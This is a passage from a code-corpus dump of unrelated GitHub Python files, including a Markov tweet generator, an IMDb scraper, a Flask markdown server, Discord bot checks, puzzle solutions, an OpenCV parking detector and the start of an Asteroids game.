[w for w in list(word_dict_two) if w[0].lower().startswith(\"o\") or w[0].lower().startswith(\"g\")]\n random_word = [w for w in list(word_dict_one)]\n\n return (first_words, random_word, word_dict_one, word_dict_two, emoji_dict_one)\n\ndef generate_emojiblock(emoji_dict):\n emojiBlock = list(random.choice(emoji_dict['\\n']))\n while len(emojiBlock) < 6:\n next = random.choice(emoji_dict[emojiBlock[-1]])\n if next != '\\n':\n emojiBlock.append(next)\n else:\n break\n return ''.join(emojiBlock)\n\ndef generate_tweet(chain_data):\n first_words, random_word, word_dict_one, word_dict_two, emoji_dict_one = chain_data\n chain = list(random.choice(first_words))\n\n tweetText = \"\"\n while not \"<|endoftext|>\" in tweetText:\n lastOne = mod_key(chain[-1])\n lastTwo = mod_key(chain[-2])\n if len(lastOne) <= 3 and (lastTwo, lastOne) in word_dict_two.keys():\n chain.append(random.choice(word_dict_two[(lastTwo, lastOne)]))\n else:\n chain.append(random.choice(word_dict_one[lastOne]))\n \n if chain[-1] == \"<|endoftext|>\" and len(chain) < 4:\n if len(lastOne) <= 3 and (lastTwo, lastOne) in word_dict_two.keys():\n if len(list(filter(lambda x: not \"<|endoftext|>\" in x, word_dict_two[(lastTwo, lastOne)]))) == 0:\n chain[-1] = random.choice(random_word)\n else:\n chain.pop()\n else:\n if len(list(filter(lambda x: not \"<|endoftext|>\" in x, word_dict_one[lastOne]))) == 0:\n chain[-1] = random.choice(random_word)\n else:\n chain.pop()\n\n if chain[-1] == \"<|emojiblock|>\":\n chain[-1] = generate_emojiblock(emoji_dict_one)\n if chain[-2] == \"<|emojiblock|>\":\n chain[-2] = generate_emojiblock(emoji_dict_one)\n \n if count_tweet(' '.join(chain)) > 280:\n break\n else:\n tweetText = ' '.join(chain)\n\n tweetText = tweetText.replace(\"<|endoftext|>\", '')\n tweetText = tweetText[0:279]\n\n return tweetText\n\n\nif __name__ == \"__main__\":\n chain_data = load_corpus('morning_dataset.txt')\n\n for i in range(100):\n print(generate_tweet(chain_data))\n","repo_name":"Azimath/ohaio_bot","sub_path":"ohaio_markov.py","file_name":"ohaio_markov.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"20136466390","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom operator import itemgetter\n\n#Faça o mesmo procedimento da questão anterior para a página: http://www.imdb.com/chart/boxoffice\n\ndef download(url, num_retries=2):\n\tprint('Downloading data from:', url)\n\tpage = None\n\ttry:\n\t\tresponse = 
requests.get(url)\n\t\tpage = response.text\n\t\tif response.status_code >= 400:\n\t\t\tprint('Download error:', response.text)\n\t\tif num_retries and 500 <= response.status_code < 600:\n\t\t\treturn download(url, num_retries - 1)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Download error:', e)\n\treturn page\n\n# testing...\nhtml = download('https://www.imdb.com/chart/boxoffice')\nsoup = bs(html, 'html.parser')\n\nmovies_div = soup.find('table', class_='chart full-width')\n\nvalues = [float(movie.get_text().replace(' ','').replace('\\n','').replace('$','').replace('M','')) for movie in movies_div.find_all('td', 'ratingColumn')]\nweekends = values[0::2]\ngrosses = values[1::2]\nnames = [movie.get_text().replace('\\n','').replace(' ','') for movie in movies_div.find_all('a', href=True) if movie.get_text().replace('\\n','').replace(' ','')!='']\nweeks = [int(week.get_text()) for week in movies_div.find_all('td',class_='weeksColumn')]\nmovies = sorted([{'name':name, 'weekend':weekend, 'gross':gross, 'week':week } for name, weekend, gross, week in zip(names,weekends,grosses,weeks)], key=itemgetter('weekend'), reverse=True)\n\nprint('weeks | weekend (US$ Mi)| gross (US$ Mi) | name')\nprint('-----------------------------------------------')\nfor movie in movies:\t\n\tprint(\"%s%s| %s%s| %s%s | %s\"%(movie['week'],(6-len(str(movie['week'])))*' ',movie['weekend'],(16-len(str(movie['weekend'])))*' ',movie['gross'],(14-len(str(movie['gross'])))*' ',movie['name']))\n","repo_name":"fabiomsrs/ml_class","sub_path":"atividade01/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10460046738","text":"from flask import Flask, render_template_string\n\n# https://www.digitalocean.com/community/tutorials/how-to-use-python-markdown-to-convert-markdown-text-to-html\n\nimport markdown\n\napp = Flask(__name__)\n\n\n@app.route('/lesson')\ndef lesson():\n    with open('./lesson1/in-this-chapter.md', 'r') as f:\n        chapter_text = f.read()\n    html = markdown.markdown(chapter_text)\n    return html\n\n\n@app.route('/exercises')\ndef exercises():\n    with open('./lesson1/exercises.md') as f:\n        exercises_text = f.read()\n    html = markdown.markdown(exercises_text)\n    return html\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n\n\n","repo_name":"emmanuelle1234/di_exercices","sub_path":"week_11/day_2/Daily Challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34437445289","text":"import pytest\nfrom unittest.mock import MagicMock, patch\nfrom decimal import Decimal\nfrom ..src.db_writer import DBWriter\n\n\n@pytest.fixture\ndef sample_data():\n    return {\n        \"controllers\": [\n            {\n                \"callsign\": \"TEST_CALLSIGN\",\n                \"controller_id\": \"TEST_ID\",\n                \"logon_time\": \"20230619100000\",\n                \"session_id\": \"TEST_SESSION_ID\",\n                \"duration\": Decimal(60.00)\n            }\n        ]\n    }\n\n\n@patch(\"data_collection.src.db_writer.DBClient\")\n@patch(\"data_collection.src.db_writer.ControllerFilter\")\n@patch(\"data_collection.src.db_writer.ControllerDataPreparer\")\ndef test_write(MockControllerDataPreparer, MockControllerFilter, MockDBClient, sample_data):\n    # Add an existing controller to the return value of get_all_items\n    MockDBClient.return_value.get_all_items.return_value = [sample_data[\"controllers\"][0]]\n\n    
MockControllerFilter.return_value.filter_data.return_value = sample_data[\"controllers\"]\n MockControllerDataPreparer.return_value.prepare_new_controller.return_value = sample_data[\"controllers\"][0]\n MockControllerDataPreparer.return_value.format_existing_controller.return_value = sample_data[\"controllers\"][0]\n\n db_writer = DBWriter(sample_data)\n result = db_writer.write()\n\n # Assert the DBClient, ControllerFilter and ControllerDataPreparer methods were called correctly\n MockDBClient.return_value.get_all_items.assert_called_once()\n MockControllerFilter.return_value.filter_data.assert_called_once()\n MockControllerDataPreparer.return_value.prepare_new_controller.assert_called_with(sample_data[\"controllers\"][0])\n MockControllerDataPreparer.return_value.format_existing_controller.assert_called_with(sample_data[\"controllers\"][0])\n\n # Assert the DBClient update_item method was called with the correct arguments\n MockDBClient.return_value.update_item.assert_called_with(sample_data[\"controllers\"][0], sample_data[\"controllers\"][0]['duration'])\n\n # Assert the result is as expected\n assert result == {'num_controllers': 1, 'num_new_controllers': 0, 'num_existing_controllers': 1}\n","repo_name":"nyartcc/application-vattix","sub_path":"lambda_function/data_collection/tests/test_db_writer.py","file_name":"test_db_writer.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15315816929","text":"import sys\n\ninput = sys.stdin.readline\n\ndic = {\n 1: \"1.,?!\",\n 2: \"2ABC\",\n 3: \"3DEF\",\n 4: \"4GHI\",\n 5: \"5JKL\",\n 6: \"6MNO\",\n 7: \"7PQRS\",\n 8: \"8TUV\",\n 9: \"9WXYZ\"\n}\n\nn = int(input())\ncom = input()\n\nans = \"\"\ncnt = 0\nfor i in range(n):\n if com[i] == com[i + 1]:\n cnt += 1\n else:\n cnt %= len(dic[int(com[i])])\n ans += dic[int(com[i])][cnt]\n cnt = 0\n\nprint(ans)\n","repo_name":"leegusrb/python","sub_path":"algorithm_monday/3-2_review.py","file_name":"3-2_review.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31108607789","text":"from statistics import median\n\ndef parse_input(path):\n with open(path) as f:\n positions = list(map(int, f.read().split(',')))\n return positions\n\ndef calc_pt1(input):\n med = median(input)\n return sum([abs(med - pos) for pos in input])\n\ndef calc_pt2(input):\n fuels = []\n for dest in range(min(input) + 1, max(input)):\n fuel = 0\n for pos in input:\n diff = abs(dest - pos)\n fuel += (diff / 2) * (1 + diff)\n fuels.append(fuel)\n return min(fuels)\n\ninput = parse_input('input.txt')\nresult = calc_pt1(input)\nprint(result)","repo_name":"julia-martin/advent-of-code-2021","sub_path":"day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19803586968","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"graph_lib_constantin_ruhdorfer\",\n version=\"1.1.0\",\n author=\"Constantin Ruhdorfer\",\n author_email=\"constantin.ruhdorfer@gmnx.de\",\n description=\"A small library for representing graphs for the class of Combinatorial Optimization at Baden-Wuerttemberg Cooperative State University Stuttgart.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n 
url=\"https://github.com/ConstantinRuhdorfer/GraphLib\",\n    packages=setuptools.find_packages(),\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires='>=3.6',\n)\n","repo_name":"ConstantinRuhdorfer/GraphLib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7120091794","text":"from ctypes import DEFAULT_MODE\nfrom subprocess import DETACHED_PROCESS\n\n\nclass No:\n    def __init__(self,dado):\n        self.dado=dado\n        self.proximo=None\n        self.anterior=None\n\nclass Lista_Dupla:\n    def __init__(self):\n        self.inicio=None\n        self.fim=None\n        self.tamanho=0\n    \n    def vazia(self):\n        if self.inicio is None:\n            return True\n        else:\n            return False\n    \n    def adicionar_inicio(self,valor):\n        no=No(valor)\n        if self.vazia():\n            self.inicio=self.fim=no\n        else:\n            no.proximo=self.inicio\n            self.inicio.anterior=no\n            no.anterior=None\n            self.inicio=no\n        self.tamanho+=1\n\n    def adicionar_fim(self,valor):\n        no=No(valor)\n        if self.vazia():\n            self.inicio=self.fim=no\n        else:\n            self.fim.proximo=no\n            no.anterior=self.fim\n            no.proximo=None\n            self.fim=no\n        self.tamanho+=1\n    \n    def inserir_indice(self,i,valor):\n        metade=int(self.tamanho/2)\n        if i>self.tamanho:\n            raise IndexError(\"Posição na memória invalida\")\n        elif i==self.tamanho:\n            self.adicionar_fim(valor)\n        elif i==0:\n            self.adicionar_inicio(valor)\n        else:\n            if i<= metade:\n                no=No(valor)\n                corrente=self.inicio\n                cont=0\n                while cont<(i-1):\n                    corrente=corrente.proximo\n                    cont+=1\n                no.proximo=corrente.proximo\n                corrente.proximo.anterior=no\n                corrente.proximo=no\n                no.anterior=corrente\n            else:\n                no=No(valor)\n                corrente=self.fim\n                cont=self.tamanho\n                while cont>i:\n                    corrente=corrente.anterior\n                    cont-=1\n                no.proximo=corrente.proximo\n                corrente.proximo.anterior=no\n                corrente.proximo=no\n                no.anterior=corrente\n        self.tamanho+=1\n\n    def remover_inicio(self):\n        if self.vazia():\n            raise TypeError(\"Lista está vazia!\")\n        elif self.tamanho==1:\n            self.inicio=None\n            self.fim=None\n        else: \n            self.inicio=self.inicio.proximo\n            self.inicio.anterior=None\n        self.tamanho-=1\n    \n    def remover_fim(self):\n        if self.vazia():\n            raise TypeError(\"Lista está vazia!\")\n        elif self.tamanho==1:\n            self.remover_inicio()\n        else:\n            self.fim=self.fim.anterior\n            self.fim.proximo=None\n        self.tamanho-=1\n    \n    def remover_index(self,i):\n        if self.vazia():\n            raise TypeError(\"Lista vazia!\")\n        elif i==0:\n            self.remover_inicio()\n        elif i==self.tamanho-1:\n            self.remover_fim()\n        else:\n            corrente=self.inicio\n            cont=0\n            while cont int:\n        result = 0\n        nums.sort()\n\n        for i in range(len(nums)):\n            a = nums[i]\n            b = target - a\n            if b < a:\n                break\n\n            other = bisect_right(nums, b)\n            between = other - i - 1\n            # each number between a and b can be there or not => like bits in a binary numbers\n            result += 2**between\n\n            result %= 10**9 + 7\n\n        return result\n","repo_name":"stbrumme/leetcode","sub_path":"1498.py","file_name":"1498.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"33495700410","text":"import imutils\nimport numpy as np\nimport cv2\nfrom random import randint\n\nfrom extract_car import extract_car\nfrom extract_rectangle import extract_rectangle\n\n\ndef extract_parking(img):\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    ret, thresh = cv2.threshold(gray, 
127, 255, 1)\n\n # cv2.imshow('Resultat', thresh)\n # cv2.waitKey(0)\n\n kernel = np.ones((3, 3), np.uint8)\n # res = cv2.erode(thresh,kernel,iterations = 1)\n # kernel = np.ones((11, 11), np.uint8)\n res = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n kernel = np.ones((9, 9), np.uint8)\n res = cv2.dilate(res, kernel, iterations=3)\n # res = cv2.erode(res, kernel, iterations=1)\n\n\n # cv2.imshow('Resultat', res)\n # cv2.waitKey(0)\n # sobelx = cv2.Sobel(res, cv2.CV_8U, 1, 0, ksize=5)\n #\n # cv2.imshow('Resultat', sobelx)\n # cv2.waitKey(0)\n #\n # kernel = np.ones((7, 3), np.uint8)\n # res = cv2.morphologyEx(sobelx, cv2.MORPH_OPEN, kernel)\n #\n # cv2.imshow('Resultat', res)\n # cv2.waitKey(0)\n contours, hierarchy = cv2.findContours(res, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in contours:\n if cv2.contourArea(cnt) < 1000:\n continue\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n cv2.drawContours(res, [box], 0, (255, 255, 255), 20)\n # cv2.rectangle(res, (x, y), (x + w, y + h), (255,255,255), 20)\n\n # cv2.drawContours(img, [cnt], 0, (randint(0,255), randint(0,255), randint(0,255)), -1)\n\n return res\n\n\nif __name__ == \"__main__\":\n name = \"Data/parking_occupied.jpg\"\n\n img = cv2.imread(name)\n\n res = extract_parking(img)\n\n res = extract_rectangle(img, res)\n res = extract_car(img, res)\n\n cv2.imshow('Resultat', res)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"blanclemjk/Hackatown2019","sub_path":"camera_receiver/extract_parking.py","file_name":"extract_parking.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39151094636","text":"import re\n\nmonkeys = dict()\n\nclass Monkey:\n def __init__(self, operation=None, a=None, b=None, value = None) -> None:\n self.operation = operation\n self.a = a\n self.b = b\n self.value = value\n pass\n\n def __str__(self) -> str:\n if self.operation != None:\n return self.a + ' ' + self.b\n else:\n return str(self.value)\n\n def getValue(self):\n if self.value == None:\n a = monkeys[self.a]\n b = monkeys[self.b]\n self.value = self.operation(a.getValue(), b.getValue())\n return self.value\n\ndef add(a,b): return a+b\ndef sub(a,b): return a-b\ndef mul(a,b): return a*b\ndef div(a,b): return a/b\noperations = {\n '+': add,\n '-': sub,\n '*': mul,\n '/': div\n}\n\nexpressionWithValue = re.compile('([a-z]{4}): ([0-9]+)')\nexpressionWithOperation = re.compile('([a-z]{4}): ([a-z]{4}) ([+\\-*/]) ([a-z]{4})')\n\nwith open('./input.txt', 'r') as input:\n#with open('./example.txt', 'r') as input:\n for line in input:\n matchWithValue = expressionWithValue.match(line)\n if matchWithValue != None:\n monkeys[matchWithValue.group(1)] = Monkey(value=int(matchWithValue.group(2)))\n else:\n matchWithOperation = expressionWithOperation.match(line)\n operation = operations[matchWithOperation.group(3)]\n a = matchWithOperation.group(2)\n b = matchWithOperation.group(4)\n monkeys[matchWithOperation.group(1)] = Monkey(operation=operation, a=a, b=b)\n\nprint(monkeys['root'].getValue())","repo_name":"Rialgar/AdventOfCode2022","sub_path":"21/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70142794003","text":"import discord\r\nimport asyncio\r\n\r\nfrom discord.ext import commands, menus\r\n\r\nfrom Utilities import AssetCreation\r\n\r\nimport asyncpg\r\n\r\nclass 
NoChar(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasChar(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass AlreadyInAssociation(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotBrotherhoodMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotGuildMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotCollegeMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsNotAssociationLeader(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsAssociationLeader(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsNotAssociationOfficer(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass AssociationFull(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotAdmin(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotMayor(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotComptroller(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasNoBankAccount(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasBankAccount(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IncorrectOccupation(commands.CheckFailure):\r\n def __init__(self, occupation, player_class, prefix, *args, **kwargs):\r\n self.message = f'This command is exclusive to the **{occupation}** class only, but you are a **{player_class}**. 
If you wish to change classes, do `{prefix}class {occupation}`.'\r\n super().__init__(message=self.message, *args, **kwargs)\r\n\r\nclass WordChainError(commands.CommandError):\r\n pass\r\n\r\nasync def not_player(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if result is None: #Then there is no char for this id\r\n return True\r\n else:\r\n raise HasChar(ctx.author, message='Player has a character and failed not_player check.')\r\n\r\nasync def is_player(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if result is not None: #Then there is a char for this id\r\n return True\r\n else:\r\n raise NoChar(ctx.message.author, message='Player does not have a character. Failed is_player check.')\r\n\r\nasync def has_char(pool, user : discord.user): #NOT A CHECK --> in-function version of is_player\r\n async with pool.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', user.id)\r\n await pool.release(conn)\r\n \r\n if result is not None: #Then there is a char for this id\r\n return True\r\n\r\nasync def not_in_guild(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if guild is None:\r\n return True\r\n else:\r\n raise AlreadyInAssociation(ctx.author, message='Player is in an association. Failed not_in_guild check.')\r\n\r\nasync def target_not_in_guild(pool, user : discord.user): #NOT A CHECK --> in-function version of not_in_guilf\r\n async with pool.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', user.id)\r\n await pool.release(conn)\r\n \r\n if guild is None:\r\n return True\r\n\r\nasync def in_brotherhood(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchrow('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n \r\n if guild[0] is None:\r\n raise NotBrotherhoodMember(ctx.author, message='Failed in_brotherhood check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild[0])\r\n if guild_type == 'Brotherhood':\r\n return True\r\n else:\r\n raise NotBrotherhoodMember(ctx.author, message='Failed in_brotherhood check.')\r\n\r\nasync def in_guild(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n if guild is None:\r\n raise NotGuildMember(ctx.author, message='Failed in_guild check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild)\r\n if guild_type == 'Guild':\r\n return True \r\n else:\r\n raise NotGuildMember(ctx.author, message='Failed in_guild check.') \r\n\r\nasync def in_college(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n if guild is None:\r\n raise NotCollegeMember(ctx.author, message='Failed in_college check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild)\r\n if guild_type == 'College':\r\n return True \r\n 
else:\r\n            raise NotCollegeMember(ctx.author, message='Failed in_college check.') \r\n\r\nasync def guild_can_be_created(ctx, name): #NOT A CHECK\r\n    async with ctx.bot.pg_con.acquire() as conn:\r\n        is_taken = await conn.fetchrow('SELECT guild_id FROM guilds WHERE guild_name = $1', name)\r\n        if is_taken is not None:\r\n            await ctx.reply('This name is already taken.')\r\n            await ctx.bot.pg_con.release(conn)\r\n            return\r\n        gold = await conn.fetchrow('SELECT gold FROM players WHERE user_id = $1', ctx.author.id)\r\n        if gold[0] < 15000:\r\n            await ctx.reply('You don\'t have enough money to form a brotherhood.')\r\n            await ctx.bot.pg_con.release(conn)\r\n            return\r\n        await ctx.bot.pg_con.release(conn)\r\n    return True #Otherwise we're good to go\r\n\r\nasync def is_guild_leader(ctx):\r\n    async with ctx.bot.pg_con.acquire() as conn:\r\n        playerrank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n    if playerrank == 'Leader':\r\n        return True\r\n    else:\r\n        raise IsNotAssociationLeader(ctx.author, message='Player is not an association leader. Failed is_guild_leader check.')\r\n\r\nasync def is_not_guild_leader(ctx):\r\n    player_guild = await AssetCreation.getGuildFromPlayer(ctx.bot.pg_con, ctx.author.id)\r\n    if ctx.author.id != player_guild['Leader']:\r\n        return True\r\n    else:\r\n        raise IsAssociationLeader(ctx.author, message='Player failed is_not_guild_leader check.')\r\n\r\nasync def is_guild_officer(ctx):\r\n    async with ctx.bot.pg_con.acquire() as conn:\r\n        rank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', ctx.author.id)\r\n        await ctx.bot.pg_con.release(conn)\r\n    \r\n    if rank == 'Officer' or rank == 'Leader':\r\n        return True\r\n    else:\r\n        raise IsNotAssociationOfficer(ctx.author, message='Player failed is_guild_officer check.')\r\n\r\nasync def target_is_guild_officer(pool, user_id : int): #NOT A CHECK\r\n    async with pool.acquire() as conn:\r\n        rank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', user_id)\r\n        await pool.release(conn)\r\n\r\n    if rank == 'Officer' or rank == 'Leader':\r\n        return True\r\n\r\n    else:\r\n        return False\r\n\r\nasync def guild_has_vacancy(ctx): \r\n    guild = await AssetCreation.getGuildFromPlayer(ctx.bot.pg_con, ctx.author.id)\r\n    members = await AssetCreation.getGuildMemberCount(ctx.bot.pg_con, guild['ID'])\r\n    capacity = await AssetCreation.getGuildCapacity(ctx.bot.pg_con, guild['ID'])\r\n    if members < capacity:\r\n        return True\r\n    else:\r\n        raise AssociationFull(ctx.author, message='Guild is full. Failed guild_has_vacancy check.')\r\n\r\nasync def target_guild_has_vacancy(pool, guild_id : int): #NOT A CHECK. 
ALT VERSION OF guild_has_vacancy\r\n guild = await AssetCreation.getGuildByID(pool, guild_id)\r\n members = await AssetCreation.getGuildMemberCount(pool, guild['ID'])\r\n capacity = await AssetCreation.getGuildCapacity(pool, guild['ID'])\r\n if members < capacity:\r\n return True \r\n\r\nadmins = [196465885148479489, 325080171591761921, 530760994289483790, 465388103792590878] #Seb, Sean, Demi, Bort\r\nasync def is_admin(ctx):\r\n if ctx.author.id in admins:\r\n return True\r\n else:\r\n raise NotAdmin(ctx.author, message='Failed is_admin check.')\r\n\r\nasync def is_mayor(ctx):\r\n offices = await AssetCreation.get_officeholders(ctx.bot.pg_con)\r\n if ctx.author.id == offices['Mayor_ID']:\r\n return True\r\n else:\r\n raise NotMayor(ctx.author, message='Failed is_mayor check.')\r\n\r\nasync def is_comptroller(ctx):\r\n offices = await AssetCreation.get_officeholders(ctx.bot.pg_con)\r\n if ctx.author.id == offices['Comptroller_ID']:\r\n return True\r\n else:\r\n raise NotComptroller(ctx.author, message='Failed is_comptroller check.')\r\n\r\nasync def has_bank_account(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n account = await conn.fetchval('SELECT id FROM guild_bank_account WHERE user_id = $1', ctx.author.id)\r\n if account:\r\n return True\r\n else:\r\n raise HasNoBankAccount(ctx.author, message='User lacks a guild bank account. Failed has_bank_account check.')\r\n\r\nasync def not_has_bank_account(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n account = await conn.fetchval('SELECT id FROM guild_bank_account WHERE user_id = $1', ctx.author.id)\r\n if not account:\r\n return True\r\n else:\r\n raise HasBankAccount(ctx.author, message='Failed not_has_bank_account check.')\r\n\r\nasync def is_blacksmith(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Blacksmith'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_farmer(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Farmer'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_hunter(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Hunter'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_butcher(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Butcher'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_scribe(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Scribe'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)","repo_name":"seanathan-discordbot/Ayesha_Bot","sub_path":"Utilities/Checks.py","file_name":"Checks.py","file_ext":"py","file_size_in_byte":12773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"17206324802","text":"\"\"\"\n\"RiceRocks\"\n(simple clone of the game Asteroids by Atari)\n\nStudent: Jared Cooney\njaredcooney2@gmail.com\n\nRuns in CodeSkulptor (Python 2)\ncodeskulptor.org\n\"\"\"\n\nimport simplegui\nimport 
math\nimport random\n\n# global constants\nWIDTH = 800\nHEIGHT = 600\nFRAME = (WIDTH, HEIGHT)\nMAX_ROCKS = 12\nSTARTING_LIVES = 3\nSAFE_RADIUS_SCALAR = 4.5\n\n# global variables\nscore = 0\nlives = STARTING_LIVES\ntime = 0\nstarted = False\nmin_rock_vel = -0.5\nmax_rock_vel = 0.5\nrock_vel_range = max_rock_vel - min_rock_vel\nsound_count1 = 0\nsound_count2 = 0\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, 